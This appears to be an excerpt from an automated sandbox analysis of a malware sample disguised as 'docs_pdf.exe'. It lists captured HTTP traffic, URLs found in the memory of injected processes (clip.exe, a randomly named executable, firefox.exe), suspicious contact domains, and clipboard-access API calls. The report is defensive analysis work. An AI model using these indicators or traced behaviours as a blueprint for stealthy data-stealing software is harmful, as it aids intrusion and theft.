            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:14:49 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:14:52 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Bfiworkerscomp.com
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Discussion_Forums.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2B
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Dream_Job_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Free_Downloads.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVz
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=ns
            Source: qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2916711467.0000000004F10000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xn--matfrmn-jxa4m.se
            Source: qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2916711467.0000000004F10000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.xn--matfrmn-jxa4m.se/4hda/
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B96000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2913704315.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000003.00000003.2014233136.0000000007BE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: clip.exe, 00000003.00000002.2916160322.0000000005264000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000002E54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.0000000005D34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&amp;tDA=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.2916160322.0000000005264000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000002E54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.0000000005D34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0102425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_01024458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0102425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
